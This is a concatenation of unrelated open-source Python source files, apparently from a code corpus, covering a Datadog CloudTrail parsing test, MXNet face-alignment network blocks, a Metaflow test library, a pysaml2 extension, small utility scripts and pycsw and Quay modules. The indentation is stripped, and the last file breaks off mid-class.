from unittest.mock import MagicMock, patch
import os
import sys
import unittest
import json
import copy
import io
import gzip
sys.modules["trace_forwarder.connection"] = MagicMock()
sys.modules["datadog_lambda.wrapper"] = MagicMock()
sys.modules["datadog_lambda.metric"] = MagicMock()
sys.modules["datadog"] = MagicMock()
sys.modules["requests"] = MagicMock()
sys.modules["requests_futures.sessions"] = MagicMock()
env_patch = patch.dict(
os.environ,
{
"DD_API_KEY": "11111111111111111111111111111111",
"DD_ADDITIONAL_TARGET_LAMBDAS": "ironmaiden,megadeth",
},
)
env_patch.start()
import lambda_function
import parsing
env_patch.stop()
class Context:
function_version = 0
invoked_function_arn = "invoked_function_arn"
function_name = "function_name"
memory_limit_in_mb = "10"
test_data = {
"Records": [
{
"eventVersion": "1.08",
"userIdentity": {
"type": "AssumedRole",
"principalId": "AROAYYB64AB3HGPQO2EPR:DatadogAWSIntegration",
"arn": "arn:aws:sts::601427279990:assumed-role/Siti_DatadogAWSIntegrationRole/i-08014e4f62ccf762d",
"accountId": "601427279990",
"accessKeyId": "ASIAYYB64AB3DWOY7JNT",
"sessionContext": {
"sessionIssuer": {
"type": "Role",
"principalId": "AROAYYB64AB3HGPQO2EPR",
"arn": "arn:aws:iam::601427279990:role/Siti_DatadogAWSIntegrationRole",
"accountId": "601427279990",
"userName": "Siti_DatadogAWSIntegrationRole",
},
"attributes": {
"creationDate": "2021-05-02T23:49:01Z",
"mfaAuthenticated": "false",
},
},
},
"eventTime": "2021-05-02T23:53:28Z",
"eventSource": "dynamodb.amazonaws.com",
"eventName": "DescribeTable",
"awsRegion": "us-east-1",
"sourceIPAddress": "172.16.31.10",
"userAgent": "Datadog",
"requestParameters": {"tableName": "KinesisClientLibraryLocal"},
"responseElements": None,
"requestID": "A9K7562IBO4MPDQE4O5G9QETRFVV4KQNSO5AEMVJF66Q9ASUAAJG",
"eventID": "a5dd11f9-f616-4ea8-8030-0b3eef554352",
"readOnly": True,
"resources": [
{
"accountId": "601427279990",
"type": "AWS::DynamoDB::Table",
"ARN": "arn:aws:dynamodb:us-east-1:601427279990:table/KinesisClientLibraryLocal",
}
],
"eventType": "AwsApiCall",
"apiVersion": "2012-08-10",
"managementEvent": True,
"recipientAccountId": "601427279990",
"eventCategory": "Management",
}
]
}
def test_data_gzipped() -> io.BytesIO:
return io.BytesIO(
gzip.compress(json.dumps(copy.deepcopy(test_data)).encode("utf-8"))
)
class TestS3CloudwatchParsing(unittest.TestCase):
def setUp(self):
self.maxDiff = 9000
@patch("parsing.boto3")
@patch("lambda_function.boto3")
def test_s3_cloudtrail_pasing_and_enrichment(self, lambda_boto3, parsing_boto3):
context = Context()
boto3 = parsing_boto3.client()
boto3.get_object.return_value = {"Body": test_data_gzipped()}
payload = {
"s3": {
"bucket": {
"name": "test-bucket",
},
"object": {
"key": "<KEY>"
},
}
}
result = parsing.parse({"Records": [payload]}, context)
expected = copy.deepcopy([test_data["Records"][0]])
expected[0].update(
{
"ddsource": "cloudtrail",
"ddsourcecategory": "aws",
"service": "cloudtrail",
"aws": {
"s3": {
"bucket": payload["s3"]["bucket"]["name"],
"key": payload["s3"]["object"]["key"],
},
"function_version": context.function_version,
"invoked_function_arn": context.invoked_function_arn,
},
}
)
# yeah, there are tags, but we don't care to compare them
result[0].pop("ddtags")
# expected parsed result, now testing enrichment
self.assertEqual(expected[0], result[0])
expected[0]["host"] = "i-08014e4f62ccf762d"
self.assertEqual(expected[0], lambda_function.enrich(result)[0])
if __name__ == "__main__":
unittest.main()
|
symbols/block.py | zerofo/sdu-face-alignment | 192 | 16796 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import mxnet as mx
import numpy as np
from config import config
def Conv(**kwargs):
body = mx.sym.Convolution(**kwargs)
return body
def Act(data, act_type, name):
if act_type=='prelu':
body = mx.sym.LeakyReLU(data = data, act_type='prelu', name = name)
else:
body = mx.symbol.Activation(data=data, act_type=act_type, name=name)
return body
def ConvFactory(data, num_filter, kernel, stride=(1, 1), pad=(0, 0), act_type="relu", mirror_attr={}, with_act=True, dcn=False, name=''):
bn_mom = config.bn_mom
workspace = config.workspace
if not dcn:
conv = mx.symbol.Convolution(
data=data, num_filter=num_filter, kernel=kernel, stride=stride, pad=pad, no_bias=True, workspace=workspace, name=name+'_conv')
else:
conv_offset = mx.symbol.Convolution(name=name+'_conv_offset', data = data,
num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
conv = mx.contrib.symbol.DeformableConvolution(name=name+"_conv", data=data, offset=conv_offset,
num_filter=num_filter, pad=(1,1), kernel=(3,3), num_deformable_group=1, stride=stride, dilate=(1, 1), no_bias=False)
bn = mx.symbol.BatchNorm(data=conv, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name+'_bn')
if with_act:
act = Act(bn, act_type, name=name+'_relu')
#act = mx.symbol.Activation(
# data=bn, act_type=act_type, attr=mirror_attr, name=name+'_relu')
return act
else:
return bn
def conv_resnet(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs):
bit = 1
ACT_BIT = config.ACT_BIT
bn_mom = config.bn_mom
workspace = config.workspace
memonger = config.memonger
#print('in unit2')
# the same as https://github.com/facebook/fb.resnet.torch#notes, a bit difference with origin paper
bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
if not binarize:
act1 = Act(data=bn1, act_type='relu', name=name + '_relu1')
conv1 = Conv(data=act1, num_filter=int(num_filter*0.5), kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv1')
else:
act1 = mx.sym.QActivation(data=bn1, act_bit=ACT_BIT, name=name + '_relu1', backward_only=True)
conv1 = mx.sym.QConvolution(data=act1, num_filter=int(num_filter*0.5), kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv1', act_bit=ACT_BIT, weight_bit=bit)
bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
if not binarize:
act2 = Act(data=bn2, act_type='relu', name=name + '_relu2')
conv2 = Conv(data=act2, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2')
else:
act2 = mx.sym.QActivation(data=bn2, act_bit=ACT_BIT, name=name + '_relu2', backward_only=True)
conv2 = mx.sym.QConvolution(data=act2, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2', act_bit=ACT_BIT, weight_bit=bit)
bn3 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
if not binarize:
act3 = Act(data=bn3, act_type='relu', name=name + '_relu3')
conv3 = Conv(data=act3, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0), no_bias=True,
workspace=workspace, name=name + '_conv3')
else:
act3 = mx.sym.QActivation(data=bn3, act_bit=ACT_BIT, name=name + '_relu3', backward_only=True)
conv3 = mx.sym.QConvolution(data=act3, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv3', act_bit=ACT_BIT, weight_bit=bit)
#if binarize:
# conv3 = mx.sym.BatchNorm(data=conv3, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn4')
if dim_match:
shortcut = data
else:
if not binarize:
shortcut = Conv(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_sc')
else:
shortcut = mx.sym.QConvolution(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_sc', act_bit=ACT_BIT, weight_bit=bit)
if memonger:
shortcut._set_attr(mirror_stage='True')
return conv3 + shortcut
def conv_hpm(data, num_filter, stride, dim_match, name, binarize, dcn, dilation, **kwargs):
bit = 1
ACT_BIT = config.ACT_BIT
bn_mom = config.bn_mom
workspace = config.workspace
memonger = config.memonger
#print('in unit2')
# the same as https://github.com/facebook/fb.resnet.torch#notes, a bit difference with origin paper
bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
if not binarize:
act1 = Act(data=bn1, act_type='relu', name=name + '_relu1')
if not dcn:
conv1 = Conv(data=act1, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(dilation,dilation), dilate=(dilation,dilation),
no_bias=True, workspace=workspace, name=name + '_conv1')
else:
conv1_offset = mx.symbol.Convolution(name=name+'_conv1_offset', data = act1,
num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
conv1 = mx.contrib.symbol.DeformableConvolution(name=name+'_conv1', data=act1, offset=conv1_offset,
num_filter=int(num_filter*0.5), pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=True)
else:
act1 = mx.sym.QActivation(data=bn1, act_bit=ACT_BIT, name=name + '_relu1', backward_only=True)
conv1 = mx.sym.QConvolution_v1(data=act1, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv1', act_bit=ACT_BIT, weight_bit=bit)
bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
if not binarize:
act2 = Act(data=bn2, act_type='relu', name=name + '_relu2')
if not dcn:
conv2 = Conv(data=act2, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(dilation,dilation), dilate=(dilation,dilation),
no_bias=True, workspace=workspace, name=name + '_conv2')
else:
conv2_offset = mx.symbol.Convolution(name=name+'_conv2_offset', data = act2,
num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
conv2 = mx.contrib.symbol.DeformableConvolution(name=name+'_conv2', data=act2, offset=conv2_offset,
num_filter=int(num_filter*0.25), pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=True)
else:
act2 = mx.sym.QActivation(data=bn2, act_bit=ACT_BIT, name=name + '_relu2', backward_only=True)
conv2 = mx.sym.QConvolution_v1(data=act2, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2', act_bit=ACT_BIT, weight_bit=bit)
bn3 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
if not binarize:
act3 = Act(data=bn3, act_type='relu', name=name + '_relu3')
if not dcn:
conv3 = Conv(data=act3, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(dilation,dilation), dilate=(dilation,dilation),
no_bias=True, workspace=workspace, name=name + '_conv3')
else:
conv3_offset = mx.symbol.Convolution(name=name+'_conv3_offset', data = act3,
num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
conv3 = mx.contrib.symbol.DeformableConvolution(name=name+'_conv3', data=act3, offset=conv3_offset,
num_filter=int(num_filter*0.25), pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=True)
else:
act3 = mx.sym.QActivation(data=bn3, act_bit=ACT_BIT, name=name + '_relu3', backward_only=True)
conv3 = mx.sym.QConvolution_v1(data=act3, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv3', act_bit=ACT_BIT, weight_bit=bit)
conv4 = mx.symbol.Concat(*[conv1, conv2, conv3])
if binarize:
conv4 = mx.sym.BatchNorm(data=conv4, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn4')
if dim_match:
shortcut = data
else:
if not binarize:
shortcut = Conv(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_sc')
else:
#assert(False)
shortcut = mx.sym.QConvolution_v1(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_sc', act_bit=ACT_BIT, weight_bit=bit)
shortcut = mx.sym.BatchNorm(data=shortcut, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_sc_bn')
if memonger:
shortcut._set_attr(mirror_stage='True')
return conv4 + shortcut
#return bn4 + shortcut
#return act4 + shortcut
def block17(net, input_num_channels, scale=1.0, with_act=True, act_type='relu', mirror_attr={}, name=''):
tower_conv = ConvFactory(net, 192, (1, 1), name=name+'_conv')
tower_conv1_0 = ConvFactory(net, 129, (1, 1), name=name+'_conv1_0')
tower_conv1_1 = ConvFactory(tower_conv1_0, 160, (1, 7), pad=(1, 2), name=name+'_conv1_1')
tower_conv1_2 = ConvFactory(tower_conv1_1, 192, (7, 1), pad=(2, 1), name=name+'_conv1_2')
tower_mixed = mx.symbol.Concat(*[tower_conv, tower_conv1_2])
tower_out = ConvFactory(
tower_mixed, input_num_channels, (1, 1), with_act=False, name=name+'_conv_out')
net = net+scale * tower_out
if with_act:
act = mx.symbol.Activation(
data=net, act_type=act_type, attr=mirror_attr)
return act
else:
return net
def block35(net, input_num_channels, scale=1.0, with_act=True, act_type='relu', mirror_attr={}, name=''):
M = 1.0
tower_conv = ConvFactory(net, int(input_num_channels*0.25*M), (1, 1), name=name+'_conv')
tower_conv1_0 = ConvFactory(net, int(input_num_channels*0.25*M), (1, 1), name=name+'_conv1_0')
tower_conv1_1 = ConvFactory(tower_conv1_0, int(input_num_channels*0.25*M), (3, 3), pad=(1, 1), name=name+'_conv1_1')
tower_conv2_0 = ConvFactory(net, int(input_num_channels*0.25*M), (1, 1), name=name+'_conv2_0')
tower_conv2_1 = ConvFactory(tower_conv2_0, int(input_num_channels*0.375*M), (3, 3), pad=(1, 1), name=name+'_conv2_1')
tower_conv2_2 = ConvFactory(tower_conv2_1, int(input_num_channels*0.5*M), (3, 3), pad=(1, 1), name=name+'_conv2_2')
tower_mixed = mx.symbol.Concat(*[tower_conv, tower_conv1_1, tower_conv2_2])
tower_out = ConvFactory(
tower_mixed, input_num_channels, (1, 1), with_act=False, name=name+'_conv_out')
net = net+scale * tower_out
if with_act:
act = mx.symbol.Activation(
data=net, act_type=act_type, attr=mirror_attr)
return act
else:
return net
def conv_inception(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs):
assert not binarize
if stride[0]>1 or not dim_match:
return conv_resnet(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs)
conv4 = block35(data, num_filter, name=name+'_block35')
return conv4
def conv_cab(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs):
workspace = config.workspace
if stride[0]>1 or not dim_match:
return conv_hpm(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs)
cab = CAB(data, num_filter, 1, 4, workspace, name, dilate, 1)
return cab.get()
def conv_block(data, num_filter, stride, dim_match, name, binarize, dcn, dilate):
if config.net_block=='resnet':
return conv_resnet(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
elif config.net_block=='inception':
return conv_inception(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
elif config.net_block=='hpm':
return conv_hpm(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
elif config.net_block=='cab':
return conv_cab(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
#def lin(data, num_filter, workspace, name, binarize, dcn):
# bit = 1
# ACT_BIT = config.ACT_BIT
# bn_mom = config.bn_mom
# workspace = config.workspace
# if not binarize:
# if not dcn:
# conv1 = Conv(data=data, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
# no_bias=True, workspace=workspace, name=name + '_conv')
# bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
# act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
# return act1
# else:
# bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
# act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
# conv1_offset = mx.symbol.Convolution(name=name+'_conv_offset', data = act1,
# num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
# conv1 = mx.contrib.symbol.DeformableConvolution(name=name+"_conv", data=act1, offset=conv1_offset,
# num_filter=num_filter, pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=False)
# #conv1 = Conv(data=act1, num_filter=num_filter, kernel=(3,3), stride=(1,1), pad=(1,1),
# # no_bias=False, workspace=workspace, name=name + '_conv')
# return conv1
# else:
# bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
# act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
# conv1 = mx.sym.QConvolution_v1(data=act1, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
# no_bias=True, workspace=workspace, name=name + '_conv', act_bit=ACT_BIT, weight_bit=bit)
# conv1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn2')
# return conv1
def lin3(data, num_filter, workspace, name, k, g=1, d=1):
bn_mom = config.bn_mom
workspace = config.workspace
if k!=3:
conv1 = Conv(data=data, num_filter=num_filter, kernel=(k,k), stride=(1,1), pad=((k-1)//2,(k-1)//2), num_group=g,
no_bias=True, workspace=workspace, name=name + '_conv')
else:
conv1 = Conv(data=data, num_filter=num_filter, kernel=(k,k), stride=(1,1), pad=(d,d), num_group=g, dilate=(d, d),
no_bias=True, workspace=workspace, name=name + '_conv')
bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
ret = act1
return ret
class CAB:
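    """Recursive builder used by ``conv_cab`` to assemble a block symbol.
    ``get_output(w, h)`` walks a triangular (w, h) index grid: along the base
    row (h == n) each step halves the channel count with a 3x3 conv, while
    inner cells average the (w + 1, h + 1) branch with a channel-doubled
    version of the (w, h + 1) branch. Intermediate symbols are memoized in
    ``sym_map``.
    """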
def __init__(self, data, nFilters, nModules, n, workspace, name, dilate, group):
self.data = data
self.nFilters = nFilters
self.nModules = nModules
self.n = n
self.workspace = workspace
self.name = name
self.dilate = dilate
self.group = group
self.sym_map = {}
def get_output(self, w, h):
key = (w, h)
if key in self.sym_map:
return self.sym_map[key]
ret = None
if h==self.n:
if w==self.n:
ret = (self.data, self.nFilters)
else:
x = self.get_output(w+1, h)
f = int(x[1]*0.5)
if w!=self.n-1:
body = lin3(x[0], f, self.workspace, "%s_w%d_h%d_1"%(self.name, w, h), 3, self.group, 1)
else:
body = lin3(x[0], f, self.workspace, "%s_w%d_h%d_1"%(self.name, w, h), 3, self.group, self.dilate)
ret = (body,f)
else:
x = self.get_output(w+1, h+1)
y = self.get_output(w, h+1)
if h%2==1 and h!=w:
xbody = lin3(x[0], x[1], self.workspace, "%s_w%d_h%d_2"%(self.name, w, h), 3, x[1])
#xbody = xbody+x[0]
else:
xbody = x[0]
#xbody = x[0]
#xbody = lin3(x[0], x[1], self.workspace, "%s_w%d_h%d_2"%(self.name, w, h), 3, x[1])
if w==0:
ybody = lin3(y[0], y[1], self.workspace, "%s_w%d_h%d_3"%(self.name, w, h), 3, self.group)
else:
ybody = y[0]
ybody = mx.sym.concat(y[0], ybody, dim=1)
body = mx.sym.add_n(xbody,ybody, name="%s_w%d_h%d_add"%(self.name, w, h))
body = body/2
ret = (body, x[1])
self.sym_map[key] = ret
return ret
def get(self):
return self.get_output(1, 1)[0] |
metaflow/plugins/env_escape/configurations/test_lib_impl/test_lib.py | RobBlumberg/metaflow | 5,821 | 16817 | <filename>metaflow/plugins/env_escape/configurations/test_lib_impl/test_lib.py
import functools
class MyBaseException(Exception):
pass
class SomeException(MyBaseException):
pass
class TestClass1(object):
cls_object = 25
def __init__(self, value):
self._value = value
self._value2 = 123
def unsupported_method(self):
pass
def print_value(self):
return self._value
def __str__(self):
return "My str representation is %s" % str(self._value)
def __repr__(self):
return "My repr representation is %s" % str(self._value)
@property
def value(self):
return self._value
@value.setter
def value(self, value):
self._value = value
def to_class2(self, count, stride=1):
return TestClass2(self._value, stride, count)
@staticmethod
def somethingstatic(val):
return val + 42
@classmethod
def somethingclass(cls):
return cls.cls_object
@property
def override_value(self):
return self._value2
@override_value.setter
def override_value(self, value):
self._value2 = value
class TestClass2(object):
def __init__(self, value, stride, count):
self._mylist = [value + stride * i for i in range(count)]
def something(self, val):
return "In Test2 with %s" % val
def __iter__(self):
self._pos = 0
return self
def __next__(self):
if self._pos < len(self._mylist):
self._pos += 1
return self._mylist[self._pos - 1]
raise StopIteration
class TestClass3(object):
def __init__(self):
print("I am Class3")
def thirdfunction(self, val):
print("Got value: %s" % val)
# raise AttributeError("Some weird error")
def raiseSomething(self):
raise SomeException("Something went wrong")
def __hidden(self, name, value):
setattr(self, name, value)
def weird_indirection(self, name):
return functools.partial(self.__hidden, name)
def test_func(*args, **kwargs):
return "In test func"
test_value = 1
|
src/saml2/extension/pefim.py | cnelson/pysaml2 | 5,079 | 16825 | #!/usr/bin/env python
import saml2
from saml2 import SamlBase
from saml2.xmldsig import KeyInfo
NAMESPACE = 'urn:net:eustix:names:tc:PEFIM:0.0:assertion'
class SPCertEncType_(SamlBase):
"""The urn:net:eustix:names:tc:PEFIM:0.0:assertion:SPCertEncType element """
c_tag = 'SPCertEncType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children['{http://www.w3.org/2000/09/xmldsig#}KeyInfo'] = ('key_info',
[KeyInfo])
c_cardinality['key_info'] = {"min": 1}
c_attributes['VerifyDepth'] = ('verify_depth', 'unsignedByte', False)
c_child_order.extend(['key_info'])
def __init__(self,
key_info=None,
x509_data=None,
verify_depth='1',
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
if key_info:
self.key_info = key_info
elif x509_data:
self.key_info = KeyInfo(x509_data=x509_data)
else:
self.key_info = []
self.verify_depth = verify_depth
#self.x509_data = x509_data
def spcertenc_type__from_string(xml_string):
return saml2.create_class_from_xml_string(SPCertEncType_, xml_string)
class SPCertEnc(SPCertEncType_):
"""The urn:net:eustix:names:tc:PEFIM:0.0:assertion:SPCertEnc element """
c_tag = 'SPCertEnc'
c_namespace = NAMESPACE
c_children = SPCertEncType_.c_children.copy()
c_attributes = SPCertEncType_.c_attributes.copy()
c_child_order = SPCertEncType_.c_child_order[:]
c_cardinality = SPCertEncType_.c_cardinality.copy()
def spcertenc_from_string(xml_string):
return saml2.create_class_from_xml_string(SPCertEnc, xml_string)
ELEMENT_FROM_STRING = {
SPCertEnc.c_tag: spcertenc_from_string,
SPCertEncType_.c_tag: spcertenc_type__from_string,
}
ELEMENT_BY_TAG = {
'SPCertEnc': SPCertEnc,
'SPCertEncType': SPCertEncType_,
}
def factory(tag, **kwargs):
return ELEMENT_BY_TAG[tag](**kwargs) |
scripts/tfloc_summary.py | lldelisle/bx-python | 122 | 16827 | <filename>scripts/tfloc_summary.py
#!/usr/bin/env python
"""
Read TFLOC output from stdin and write out a summary in which the nth line
contains the number of sites found in the nth alignment of the input.
TODO: This is very special case, should it be here?
"""
import sys
from collections import defaultdict
counts = defaultdict(int)
max_index = -1
for line in sys.stdin:
if line[0].isdigit():
current_index = int(line)
max_index = max(current_index, max_index)
elif line[0] == "'":
counts[current_index] += 1
else:
raise ValueError("Invalid input line " + line)
for i in range(max_index + 1):
print(counts.get(i, 0))
|
s3prl/upstream/example/hubconf.py | hhhaaahhhaa/s3prl | 856 | 16833 | from .expert import UpstreamExpert as _UpstreamExpert
def customized_upstream(*args, **kwargs):
"""
To enable your customized pretrained model, you only need to implement
upstream/example/expert.py and leave this file as is. This file is
used to register the UpstreamExpert in upstream/example/expert.py
The following is a brief introduction of the registration mechanism.
The s3prl/hub.py will collect all the entries registered in this file
(callable variables without the underscore prefix) as a centralized
upstream factory. One can pick up this upstream from the factory via
1.
from s3prl.hub import customized_upstream
model = customized_upstream(ckpt, model_config)
2.
model = torch.hub.load(
'your_s3prl_path',
'customized_upstream',
ckpt,
model_config,
source='local',
)
Our run_downstream.py and downstream/runner.py follows the first usage
"""
return _UpstreamExpert(*args, **kwargs)
|
pycsw/pycsw/plugins/profiles/profile.py | Geosoft2/Geosoftware-II-AALLH | 118 | 16841 | # -*- coding: utf-8 -*-
# =================================================================
#
# Authors: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
#
# Copyright (c) 2015 <NAME>
# Copyright (c) 2015 <NAME>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# =================================================================
import os
import warnings
class Profile(object):
''' base Profile class '''
def __init__(self, name, version, title, url,
namespace, typename, outputschema, prefixes, model, core_namespaces,
added_namespaces,repository):
''' Initialize profile '''
self.name = name
self.version = version
self.title = title
self.url = url
self.namespace = namespace
self.typename = typename
self.outputschema = outputschema
self.prefixes = prefixes
self.repository = repository
if 'DescribeRecord' in model['operations']:
model['operations']['DescribeRecord']['parameters']\
['typeName']['values'].append(self.typename)
model['operations']['GetRecords']['parameters']['outputSchema']\
['values'].append(self.outputschema)
model['operations']['GetRecords']['parameters']['typeNames']\
['values'].append(self.typename)
model['operations']['GetRecordById']['parameters']['outputSchema']\
['values'].append(self.outputschema)
if 'Harvest' in model['operations']:
model['operations']['Harvest']['parameters']['ResourceType']\
['values'].append(self.outputschema)
# namespaces
core_namespaces.update(added_namespaces)
# repository
model['typenames'][self.typename] = self.repository
def extend_core(self, model, namespaces, config):
''' Extend config.model and config.namespaces '''
raise NotImplementedError
def check_parameters(self):
''' Perform extra parameters checking.
Return dict with keys "locator", "code", "text" or None '''
raise NotImplementedError
def get_extendedcapabilities(self):
''' Return ExtendedCapabilities child as lxml.etree.Element '''
raise NotImplementedError
def get_schemacomponents(self):
''' Return schema components as lxml.etree.Element list '''
raise NotImplementedError
def check_getdomain(self, kvp):
'''Perform extra profile specific checks in the GetDomain request'''
raise NotImplementedError
def write_record(self, result, esn, outputschema, queryables):
''' Return csw:SearchResults child as lxml.etree.Element '''
raise NotImplementedError
def transform2dcmappings(self, queryables):
''' Transform information model mappings into csw:Record mappings '''
raise NotImplementedError
def load_profiles(path, cls, profiles):
''' load CSW profiles, return dict by class name '''
def look_for_subclass(modulename):
module = __import__(modulename)
dmod = module.__dict__
for modname in modulename.split('.')[1:]:
dmod = dmod[modname].__dict__
for key, entry in dmod.items():
if key == cls.__name__:
continue
try:
if issubclass(entry, cls):
aps['plugins'][key] = entry
except TypeError:
continue
aps = {}
aps['plugins'] = {}
aps['loaded'] = {}
for prof in profiles.split(','):
# fgdc, atom, dif, gm03 are supported in core
# no need to specify them explicitly anymore
# provide deprecation warning
# https://github.com/geopython/pycsw/issues/118
if prof in ['fgdc', 'atom', 'dif', 'gm03']:
warnings.warn('%s is now a core module, and does not need to be'
' specified explicitly. So you can remove %s from '
'server.profiles' % (prof, prof))
else:
modulename='%s.%s.%s' % (path.replace(os.sep, '.'), prof, prof)
look_for_subclass(modulename)
return aps
|
nngeometry/object/__init__.py | amyami187/nngeometry | 103 | 16852 | from .pspace import (PMatDense, PMatBlockDiag, PMatDiag,
PMatLowRank, PMatImplicit,
PMatKFAC, PMatEKFAC, PMatQuasiDiag)
from .vector import (PVector, FVector)
from .fspace import (FMatDense,)
from .map import (PushForwardDense, PushForwardImplicit,
PullBackDense)
|
endpoints/v2/errors.py | giuseppe/quay | 2,027 | 16855 | import bitmath
class V2RegistryException(Exception):
def __init__(
self,
error_code_str,
message,
detail,
http_status_code=400,
repository=None,
scopes=None,
is_read_only=False,
):
super(V2RegistryException, self).__init__(message)
self.http_status_code = http_status_code
self.repository = repository
self.scopes = scopes
self.is_read_only = is_read_only
self._error_code_str = error_code_str
self._detail = detail
def as_dict(self):
error_dict = {
"code": self._error_code_str,
"message": str(self),
"detail": self._detail if self._detail is not None else {},
}
if self.is_read_only:
error_dict["is_readonly"] = True
return error_dict
class BlobUnknown(V2RegistryException):
def __init__(self, detail=None):
super(BlobUnknown, self).__init__("BLOB_UNKNOWN", "blob unknown to registry", detail, 404)
class BlobUploadInvalid(V2RegistryException):
def __init__(self, detail=None):
super(BlobUploadInvalid, self).__init__(
"BLOB_UPLOAD_INVALID", "blob upload invalid", detail
)
class BlobUploadUnknown(V2RegistryException):
def __init__(self, detail=None):
super(BlobUploadUnknown, self).__init__(
